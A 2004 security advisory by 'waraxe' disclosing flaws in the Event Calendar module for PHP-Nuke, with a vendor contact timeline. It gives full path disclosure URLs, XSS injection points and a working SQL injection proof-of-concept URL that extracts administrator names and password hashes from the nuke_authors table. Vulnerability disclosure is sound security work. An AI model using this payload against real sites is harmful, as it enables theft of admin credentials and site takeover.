{=======================================================================
=========}

{ [waraxe-2004-SA#038] }

{=======================================================================
=========}

{ }

{ [ Multiple vulnerabilities in Event Calendar module for PhpNuke ] }

{ }

{=======================================================================
=========}

Author: Janek Vind "waraxe"

Date: 17. November 2004

Location: Estonia, Tartu

Web: http://www.waraxe.us/index.php?modname=sa&id=38

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Module's Name: Event Calendar

Module's Version: 2.13 - March 16th, 2004

Module's Description: Provides an event calendar for PHP-Nuke communities.

License: GNU/GPL

Author's Name: Original author - Rob Sutton. Development continued by Holbrookau.

Author's Email: phpnuke (at) holbrookau (dot) net [email concealed]

Event Calendar - a module for PHP-Nuke.

Based on version 1.5 by Rob Sutton, the Event Calendar found here is much updated

and features many improvments and add-ons. For example, the administration area features

configuration via a graphical interface, posting of events can be moderated and users even

have the option of adding comments to any event.

Homepage: http://phpnuke.holbrookau.net/

Vulnerabilities:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This piece of sowtware has many security related flaws due to poor user-submitted data

handling.

A - Full Path Disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A1 - full path disclosure in "config.php":

http://localhost/nuke73/modules/Calendar/config.php

Warning: main(modules/Calendar/configset.php): failed to open stream: No such file or directory in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 11

Warning: main(): Failed opening 'modules/Calendar/configset.php' for inclusion (include_path='.;c:\php4\pear') in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 11

Warning: main(mainfile.php): failed to open stream: No such file or directory in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 14

Warning: main(): Failed opening 'mainfile.php' for inclusion (include_path='.;c:\php4\pear') in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 14

Warning: main(modules//language/lang-english.php): failed to open stream: No such file or directory in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 19

Warning: main(): Failed opening 'modules//language/lang-english.php' for inclusion (include_path='.;c:\php4\pear') in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 19

A2, A3 - full path disclosure in "index.php" and "submit.php":

http://localhost/nuke73/modules/Calendar/index.php

http://localhost/nuke73/modules/Calendar/submit.php

B - XSS aka cross site scripting:

Examples:

http://localhost/nuke73/modules.php?name=Calendar&file=submit&type=[xss code here]

http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Previe
w&day=[xss code here]

http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Previe
w&month=[xss code here]

http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Previe
w&year=[xss code here]

http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Previe
w&type=[xss code here]

C - script injection in calendar event comments:

It's serious bug - anyone can insert javascript exploit code to event comments

and if user or admin will read it, javascript will trigger and bad things can

happen - like cookie theft, arbitrary admin operations, etc.

D - critical sql injection bugs in code:

If we take a deep look at source code, then there can be found multiple sql queries,

where some variables, mostly "$eid" and "$cid" ARE NOT surrounded with single quotes.

Therefore sql injection is possible. Further exploitation will depend on database

software and version. In case of the mysql version 4.x with UNION functionality enabled,

arbitrary data can be retrieved from database, inluding admin(s) authentication credentials.

As tradition, there is proof of concept:

----------------[ real life exploit ]---------------

http://localhost/nuke73/modules.php?name=Calendar&file=index&type=view&e
id=-99%20UNION%20ALL%20SELECT

%201,1,aid,1,pwd,1,1,1,1,1,1,1,1,1,1%20FROM%20nuke_authors%20WHERE%20rad
minsuper=1

----------------[/real life exploit ]---------------

How to fix:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vendor contacted: 06. September 2004

Vendor responded: 06. September 2004

Detailed list of problems sent to vendor: 08. September 2004

Since then no more response from software developer and downloadable version

still unpatched.

For help with patching look @ here - http://www.waraxe.us/forums.html

Additional recources:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Free proxy lists - http://www.waraxe.us/forum/viewforum.php?f=21

Base64 online tool - http://base64-encoder-online.waraxe.us/base64/base64-encoder.php

Greetings:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to Raido Kerna, icenix, g0df4th3r and slimjim100!

Tervitused - Heintz ja Maku!

Contact:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe (at) yahoo (dot) com [email concealed]

Janek Vind "waraxe"

Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------

[ reply ]